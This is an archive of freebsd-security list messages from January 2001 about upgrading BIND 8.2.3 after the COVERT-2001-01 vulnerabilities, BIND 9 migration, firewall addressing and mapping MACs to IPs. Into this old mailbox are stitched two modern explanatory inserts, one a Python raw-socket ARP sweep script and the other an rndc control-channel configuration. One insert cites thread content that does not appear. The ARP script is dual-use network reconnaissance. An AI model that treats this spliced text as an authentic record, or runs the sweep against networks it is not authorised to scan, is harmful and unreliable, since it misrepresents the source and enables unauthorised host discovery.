From: Matt Dillon Message-Id: <200101300108.f0U18MO81199@earth.backplane.com> To: Remy Wisaksono Cc: Kris Kennaway , Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, I'm really confused now. I am currently running 8.2.3-T6B. Do I need to upgrade or am I ok? If I need to upgrade, is the patch in the tree now or do I need to wait? Thanks, -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:22:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8A2C837B698 for ; Mon, 29 Jan 2001 17:22:02 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0U1Pfb01662; Mon, 29 Jan 2001 17:25:42 -0800 (PST) (envelope-from kris) Date: Mon, 29 Jan 2001 17:25:40 -0800 
From: Kris Kennaway To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129172540.B1562@citusc17.usc.edu> References: <20010129133658.A27202@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bp/iNruPH9dso1Pn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from remy@frogtongue.com on Mon, Jan 29, 2001 at 08:02:11PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --bp/iNruPH9dso1Pn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote: >=20 > I upgraded my bind8.2.3-T6B and when typing > "named -v" command, I get the 8.2.3-T6B ver. >=20 > When typing the following comman,=20 > "nslookup -q=3Dtxt -class=3DCHAOS version.bind. 0" > I got; > VERSION.BIND text =3D "8.2.3-REL" >=20 > (also I did check my log file ....everyting looks good now.) 
Well, it seems you didn't actually upgrade it properly :-) Kris --bp/iNruPH9dso1Pn Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dhgUWry0BWjoQKURAm9dAKCwGxLSIp8LMfyEBvvtqLKJyRUKzACg78Yb tqsza+1Zgqh+S05Y1MUFGYY= =oPB0 -----END PGP SIGNATURE----- --bp/iNruPH9dso1Pn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:34:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id BC9C937B402 for ; Mon, 29 Jan 2001 17:34:31 -0800 (PST) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id RAA29555; Mon, 29 Jan 2001 17:34:30 -0800 (PST) (envelope-from fbsd-secure@ursine.com) Message-ID: <3A761A26.4F520934@ursine.com> Date: Mon, 29 Jan 2001 17:34:30 -0800 
From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: Matt Dillon Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > Ok, I'm really confused now. I am currently running 8.2.3-T6B. > > Do I need to upgrade or am I ok? You need to upgrade. The ISC web site has a good list of all known BIND vulnerabilities and which versions are affected for each one: http://www.isc.org/products/BIND/bind-security.html In particular, the info on the "TSIG" vulnerability says that all beta versions of 8.2.3 are vulnerable. Since 8.2.3-T6B is a beta version, it is therefore vulnerable. > If I need to upgrade, is the patch > in the tree now or do I need to wait? I believe the latest message from Kris was that 4.x-STABLE has the updated BIND integrated, and 3.x-STABLE should be updated by tomorrow. If you update via the bind8 port instead, it has also been updated for 8.2.3. The bind8 port puts files in a different location than the BIND files from the base system install, so be careful if you do that, especially making sure your /etc/rc.conf will start the correct version. The prebuilt packages directory at freebsd.org still had just 8.2.2-p7, as far as I could tell, but that will presumably change over the next day or two. Or you -could- just download 8.2.3 directly from ISC (www.isc.org), and install it that way. Some files might end up in slightly different directories, but I believe that's the only impact you'll see (although somebody is sure to pipe up if I'm wrong on that one.) 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:38:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from xgate4.sd.co.nz (ns.netxsecure.com [210.55.57.156]) by hub.freebsd.org (Postfix) with ESMTP id BF64237B400 for ; Mon, 29 Jan 2001 17:38:12 -0800 (PST) Received: from netxsecure.net (xmgate-172-2.sd.co.nz [172.16.30.2]) by xgate4.sd.co.nz (8.11.0/8.11.0) with ESMTP id f0U1xxE15062; Tue, 30 Jan 2001 14:59:59 +1300 (NZDT) Message-ID: <3A761E44.1E7306FB@netxsecure.net> Date: Tue, 30 Jan 2001 14:52:04 +1300 From: "Michael A. Williams" X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.5-22 i586) X-Accept-Language: en MIME-Version: 1.0 To: Matt@netxsecure.net, Dillon@netxsecure.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Archived: msg.Arcx4874@xgate4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > Ok, I'm really confused now. I am currently running 8.2.3-T6B. > > Do I need to upgrade or am I ok? If I need to upgrade, is the patch > in the tree now or do I need to wait? > Hi Matt, According to: Subject: [COVERT-2001-01] Multiple Vulnerabilities in BIND Date: Mon, 29 Jan 2001 06:31:55 -0800 
From: COVERT Labs To: BUGTRAQ@SECURITYFOCUS.COM Vulnerable Systems BIND 8 versions: 8.2, 8.2.1 8.2.2 through to 8.2.2-P7 8.2.3-T1A through to 8.2.3-T9B <--- 8.2.3-T6B fits in here. BIND 4 versions: buffer overflow - 4.9.5 through to 4.9.7 format string - 4.9.3 through to 4.9.5-P1 You are vulnerable and do need to upgrade. Mike. -- Michael A. Williams, InfoSec Technology Manager NetXSecure NZ Limited, mike@netxsecure.net www.netxsecure.com Ph.+64.9.278.8348, Fax.+64.9.278.8352, Mob.+64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:43:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id DC89437B402 for ; Mon, 29 Jan 2001 17:43:10 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0U1hAJ82170; Mon, 29 Jan 2001 17:43:10 -0800 (PST) (envelope-from dillon) Date: Mon, 29 Jan 2001 17:43:10 -0800 (PST) 
From: Matt Dillon Message-Id: <200101300143.f0U1hAJ82170@earth.backplane.com> To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> <3A761A26.4F520934@ursine.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you for clearing up the issue, gentlemen! -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18: 9:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 4166E37B402 for ; Mon, 29 Jan 2001 18:09:00 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id C9E4DBA4E8; Mon, 29 Jan 2001 18:09:29 -0800 (PST) Date: Mon, 29 Jan 2001 18:09:29 -0800 
From: Kris Kennaway To: Mehmet Hinc Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129180929.C38900@xor.obsecurity.org> References: <3A75FABD.AA021EE2@pozitif.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="H8ygTp4AXg6deix2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A75FABD.AA021EE2@pozitif.net>; from marduk@pozitif.net on Tue, Jan 30, 2001 at 01:20:29AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --H8ygTp4AXg6deix2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 01:20:29AM +0200, Mehmet Hinc wrote: > Patching file doc/man/Makefile using Plan A... > Hunk #1 succeeded at 52. > Hunk #2 succeeded at 105. > done > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |--- src/bin/Makefile.orig Sat Dec 23 00:02:48 2000 > |+++ src/bin/Makefile Mon Jan 29 14:11:13 2001 > -------------------------- > Patching file src/bin/Makefile using Plan A... > Hunk #1 failed at 58. > 1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej > done > >> Patch patch-ac failed to apply cleanly. You have the old files/patch-ac. Try updating again. I just verified that the port does indeed build correctly on a freshly cvsupped system. 
Kris --H8ygTp4AXg6deix2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6diJZWry0BWjoQKURAuv7AJ91waKofVGa0yf8UYtysgDIRIzoOACfbX0o pXfDreK/YjidXggeXzM9EpQ= =DFUy -----END PGP SIGNATURE----- --H8ygTp4AXg6deix2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18:43:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from albatross.prod.itd.earthlink.net (albatross.prod.itd.earthlink.net [207.217.120.120]) by hub.freebsd.org (Postfix) with ESMTP id 2419E37B400 for ; Mon, 29 Jan 2001 18:43:07 -0800 (PST) Received: from pavilion (user-33qtsp5.dialup.mindspring.com [199.174.243.37]) by albatross.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with SMTP id SAA28822 for ; Mon, 29 Jan 2001 18:43:05 -0800 (PST) Message-ID: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion> 
From: "Richard Ward" To: Subject: BIND 9.1 woes Date: Mon, 29 Jan 2001 21:43:03 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just downloaded the BIND 9.1 tarball after hearing about the chaos with previous versions. I did run into something odd that I can't quite figure out; it's also mentioned in the 9.1 documentation and I'm sure someone knows the answer. I managed to start BIND fine, yet digging through the logs I ran into this line that makes me wonder. entropy.c:948: unexpected error: fcntl(8, F_SETFL, 4): Inappropriate ioctl for device Could someone shed light on this "problem"? Also, when trying to start BIND 9.1, it will start fine as 'named -g', though when I try to 'named -u bind -g bind' (so it runs as that user/group) it doesn't launch to the background, and fails to start period. Any ideas? (Sorry for all the questions, I just moved from 8.X and am still getting used to the changes/features) Thanks. 
Richard Ward mh@maKintosh.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18:52:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.marketnews.com (mail.marketnews.com [205.183.200.2]) by hub.freebsd.org (Postfix) with ESMTP id 8108737B402 for ; Mon, 29 Jan 2001 18:52:05 -0800 (PST) Received: (from nobody@localhost) by mail.marketnews.com (8.11.0/8.9.3) id f0U2psU39919 for freebsd-security@FreeBSD.ORG; Mon, 29 Jan 2001 21:51:54 -0500 (EST) X-Authentication-Warning: mail.marketnews.com: nobody set sender to mharding@marketnews.com using -f To: Subject: My FreeBSD Firewall Message-ID: <980823114.3a762c4a041fa@mail.marketnews.com> Date: Mon, 29 Jan 2001 21:51:54 -0500 
From: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0-pre13 X-Originating-IP: 63.23.134.35 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I am building a firewall and have some questions about how to implement it. The basic firewall is a FreeBSD box running squid for transparent proxy, IPFW for dummynet to rate limit SYNs, and IPF as my main stateful packet filter. The problem I have is with putting this into production. I have a T1 to the internet, the router's IP address is 172.16.1.1 (well not really but it works for the example) and all of the computers on the LAN are in the 172.16.1.0 (once again, only for the example) network. So here I get to the question: is there any way to set the firewall with the same IP address as the router to make the install fairly transparent to the users? Could I set the firewall up as 172.16.1.1 and use NAT to let it communicate with the router for internet traffic? How would I set up my routing tables? Also if anyone has any input as far as how I am building my firewall that would be very appreciated. Thank you, Mason To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19: 1:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id F003037B402 for ; Mon, 29 Jan 2001 19:01:23 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id TAA36124; Mon, 29 Jan 2001 19:01:27 -0800 (PST) (envelope-from root@noops.org) Date: Mon, 29 Jan 2001 19:01:27 -0800 (PST) 
From: Thomas Cannon To: mharding@marketnews.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: My FreeBSD Firewall In-Reply-To: <980823114.3a762c4a041fa@mail.marketnews.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you want to add the firewall but keep the default gateway the same for all the clients you'll either have to do some sort of abracadabra magic with arp, or take the path of least resistance -- change the router's IP and make your firewall 127.16.1.1 Just my $.02 ... if even that much -tcannon On Mon, 29 Jan 2001 mharding@marketnews.com wrote: > Hello. I am building a Firewall and have some questions about how to implement > it. The basic firewall is a FreeBSD box running squid for transparent proxy, > IPFW for dummynet to rate limit syn's, and IPF as my main statefull packet > filter. The problem I have is with putting this into production. I have a T1 > to the internet, the routers IP address is 172.16.1.1(well not really but it > works for the example) and all of the computers on the LAN are in the 172.16.1.0 > (once again..only for the example) network. So here I get to the > question....is there any way to set the firewall with the same IP address as > the router to make the install fairly transparent to the users? Could I set > the firewall up as 172.16.1.1 and use NAT to let it communicate with the router > for internet traffic? How would I set up my routing tables? Also if anyone > has any input as far as how I am building my firewall that would be very > appreciated. 
> > Thank you, > Mason > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19:10:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from icmp.dhs.org (unknown [24.108.142.198]) by hub.freebsd.org (Postfix) with ESMTP id C3B3D37B400 for ; Mon, 29 Jan 2001 19:10:10 -0800 (PST) Received: from localhost (modulus@localhost) by icmp.dhs.org (8.11.1/8.11.1) with ESMTP id f0U3ESo24881 for ; Mon, 29 Jan 2001 21:14:28 -0600 (CST) (envelope-from modulus@icmp.dhs.org) Date: Mon, 29 Jan 2001 21:14:27 -0600 (CST) 
From: disassembled To: freebsd-security@FreeBSD.ORG Subject: mapping arp Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was wondering if there was any way I could map a MAC address back to its assigned IP address without using a rarpd. Something I was considering was writing a program that sent out a series of ARP who-has packets to the network, then ran a cmp on the 48-bit values that returned in the replies against some MAC address that would be supplied on the command line. If anyone knows anything about that and could help me out, I would be grateful. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19:15:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6D88C37B400 for ; Mon, 29 Jan 2001 19:15:37 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.1/8.11.1) id f0U3Fal00721 for freebsd-security@freebsd.org; Mon, 29 Jan 2001 22:15:36 -0500 (EST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.1/8.11.1av) with ESMTP id f0U3FTe00713 for ; Mon, 29 Jan 2001 22:15:30 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010129221351.03331388@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 29 Jan 2001 22:15:28 -0500 To: freebsd-security@freebsd.org 
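The plan in the "mapping arp" message (broadcast an ARP who-has for each address on the segment, then compare the 48-bit sender hardware address in every reply with the MAC given on the command line) is the entire technique. What follows is an added example of it, not the poster's code: the request-frame builder, the reply parser, the comparison, and a sweep routine that uses a Linux AF_PACKET raw socket. On FreeBSD, where the poster is, the send and receive side would go through /dev/bpf instead; the interface name, the local MAC and IP, and the assumption that the segment is a /24 are the example's own.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def mac_bytes(text):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes (also accepts '-' separators)."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def mac_text(raw):
    return ":".join("%02x" % b for b in raw)


def build_who_has(sender_mac, sender_ip, target_ip):
    """Ethernet broadcast frame carrying 'who-has target_ip tell sender_ip'."""
    eth = BROADCAST + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REQUEST)   # Ethernet/IPv4
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)  # sender hw/proto
    arp += b"\x00" * 6 + socket.inet_aton(target_ip)           # target hw/proto
    return eth + arp


def parse_arp_reply(frame):
    """(sender_mac, sender_ip) from an ARP reply, or None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen, op) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    return mac_text(frame[22:28]), socket.inet_ntoa(frame[28:32])


def find_ip_for_mac(wanted_mac, frames):
    """The comparison the poster describes: match each reply's 48-bit sender
    hardware address against the MAC given on the command line."""
    wanted = mac_bytes(wanted_mac)
    hits = []
    for frame in frames:
        parsed = parse_arp_reply(frame)
        if parsed and mac_bytes(parsed[0]) == wanted:
            hits.append(parsed[1])
    return hits


def hosts_in_24(network_ip):
    """172.16.1.0 -> the 254 host addresses of that /24 (assumed prefix length)."""
    base = struct.unpack("!I", socket.inet_aton(network_ip))[0] & 0xFFFFFF00
    return [socket.inet_ntoa(struct.pack("!I", base + i)) for i in range(1, 255)]


def sweep(interface, my_mac, my_ip, network_ip, wanted_mac, timeout=1.0):
    """Linux AF_PACKET version (FreeBSD would open /dev/bpf instead): send one
    who-has per host, collect every reply until the line goes quiet, and
    return the IP address(es) that answered with wanted_mac. Needs root."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((interface, 0))
    sock.settimeout(timeout)
    for ip in hosts_in_24(network_ip):
        sock.send(build_who_has(my_mac, my_ip, ip))
    replies = []
    try:
        while True:
            replies.append(sock.recv(65535))
    except socket.timeout:
        pass
    sock.close()
    return find_ip_for_mac(wanted_mac, replies)
```

Everything except sweep() is plain byte handling and runs anywhere, which is also where the checks belong: parse_arp_reply() rejects anything that is not an Ethernet/IPv4 ARP reply before a single field is trusted. The caveat a practitioner wants here is the same one Kris raised earlier in the thread about port scans: ARP is unauthenticated, so any host on the segment can answer for any address. A mapping obtained this way tells you who claimed that MAC at that moment, and two IPs answering with the same MAC (or one IP answering from two MACs) is itself a finding worth logging rather than a result to take at face value.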
From: Mike Tancsa Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <4.2.2.20010129175758.03255570@marble.sentex.net> References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote: >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: >>Is there a big reason why anyone would not want to just go ahead and run >>bind 9? > >I dont think all the features are there yet. At least the last time I >looked at it, there were some things unimplemented. Also, the >configuration is not totally compatible. I also found it to be a little >unpredictable when I tried version 9.0.1. Perhaps its more stable now, >but I personally would wait another month or so for it to shake out. Here is a good summary from the NANOG list by Greg Wood on some of the things missing, and some of the things that are different. 
>From: woods@weird.com (Greg A. Woods) >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ] > > Subject: Re: sorry to ruin several of your evenings... > > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0 > > (sorry I purged some mails before their time). Just for the sake of > > readiness, be aware that there are some 8.x options which are unsupported > > in 9.x. I did an in-place upgrade and had to make a few (mostly > > insignificant) changes which may be problematic for larger sites. > > > > The global config entries I had to remove were: > > > > fake-iquery yes > > multiple-cnames yes > > rfc2308-type1 yes > > check-names slave ignore > > maintain-ixfr-base true > >That's just the beginning! :-) > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option >'memstatistics-file' is not yet implemented >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the >'auth-nxdomain' option is now 'no' >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option >'host-statistics' is not yet implemented >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is >obsolete >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is >not implemented >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'os' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'parser' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'load' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'panic' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'packet' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'eventlib' ignored > >I don't yet know if "host-statistics" is still necessary to be able to >see the source of an RR in a dump file, or not, but if so then that'll >be a road-block in keeping me from 
using 9.1.0 in production. > >I'm also very partial to 'check-names'. I've been happy using the >following in many locations: > > check-names master fail; > check-names slave fail; > check-names response fail; > > >Even more critically the old 'ndc' program has been replaced by 'rndc', >which won't work until you've configured it (/etc/rndc.conf) *and* you >add "controls" statements to your /etc/named.conf to allow it to >connect, authenticate, and send commands. There doesn't seem to be a >default way of setting it up for local-only control. I haven't done >this yet > >Even worse than that the new BIND-9 'named' not only doesn't handle >signals in the same way as previous versions, but it shuts down instead >of ignoring SIGINT (which used to generate a dump file, which is why >I've not yet successfully generated and viewed a dump file to see if the >source of the RR is recorded in there!). So: > > >WARNING: Anyone with scripts or other programs that use signals >(i.e. kill(1), or kill(2)) to control their named process will almost >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its >mechanisms)! > > >You'll also find that the new named-checkconf fails if you use: > > options { > directory "/etc/namedb"; > }; > >and then try to do something like: > > include "named-rfc1918.conf"; > include "named-slave.conf"; > include "named-master.conf"; > >However the named process itself does seem to do the >chdir("/etc/namedb") before trying to do the "include"s, >and if you start named-checkconf from within the right >directory it'll work.... 
-------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 20:40:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id C0E8037B404 for ; Mon, 29 Jan 2001 20:39:51 -0800 (PST) Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id f0U4diu15205; Mon, 29 Jan 2001 22:39:44 -0600 (CST) Date: Mon, 29 Jan 2001 22:39:43 -0600 
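Greg Woods' note above says that rndc "won't work until you've configured it (/etc/rndc.conf) *and* you add "controls" statements to your /etc/named.conf", and that there seems to be no default for local-only control. The following is an added example, not taken from the quoted message or from ISC's migration notes, of the minimal local-only setup for BIND 9: the control channel listens on loopback only and accepts only peers that hold the shared key. The key name, the paths (FreeBSD's /etc/namedb) and the base64 secret are placeholders; generate a fresh random secret rather than reusing the one shown.

```conf
# /etc/namedb/named.conf  (added example; the secret below is a placeholder)
key "rndc-key" {
    algorithm hmac-md5;
    secret "UGxhY2Vob2xkZXJTZWNyZXQ=";   # replace with a freshly generated base64 value
};

controls {
    # Listen on loopback only, and accept only loopback peers that prove
    # possession of rndc-key. Do not bind this to an external address.
    inet 127.0.0.1 port 953 allow { 127.0.0.1; } keys { "rndc-key"; };
};

# /etc/rndc.conf  (same key; mode 0600, readable only by whoever may run rndc)
options {
    default-server 127.0.0.1;
    default-port 953;
    default-key "rndc-key";
};

key "rndc-key" {
    algorithm hmac-md5;
    secret "UGxhY2Vob2xkZXJTZWNyZXQ=";
};
```

With both files in place, "rndc reload" replaces the HUP that scripts used to send, which is the re-coding the quoted WARNING is about. Anyone who can reach the control port with the key can stop the server, so keeping the listener on 127.0.0.1 and the secret out of world-readable files is the whole point of the allow and keys clauses.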
From: Marius Strom To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: BIND9 Migration from BIND8 (Was: BIND 8.2.3 upgrade available) Message-ID: <20010129223943.L388@marius.org> Mail-Followup-To: Mike Tancsa , freebsd-security@freebsd.org References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> <4.2.2.20010129175758.03255570@marble.sentex.net> <4.2.2.20010129221351.03331388@marble.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.2.20010129221351.03331388@marble.sentex.net>; from mike@sentex.net on Mon, Jan 29, 2001 at 10:15:28PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've posted the migration text file out of the bind-9.1.0 package at http://www.marius.org/~marius/unix/migration should anyone care for ISC's full details without downloading the full archive. On Mon, Jan 29, 2001 at 10:15:28PM -0500, Mike Tancsa wrote: > At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote: > >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: > >>Is there a big reason why anyone would not want to just go ahead and run > >>bind 9? > > > >I dont think all the features are there yet. At least the last time I > >looked at it, there were some things unimplemented. Also, the > >configuration is not totally compatible. I also found it to be a little > >unpredictable when I tried version 9.0.1. Perhaps its more stable now, > >but I personally would wait another month or so for it to shake out. > > > Here is a good summary from the NANOG list by Greg Wood on some of the > things missing, and some of the things that are different. 
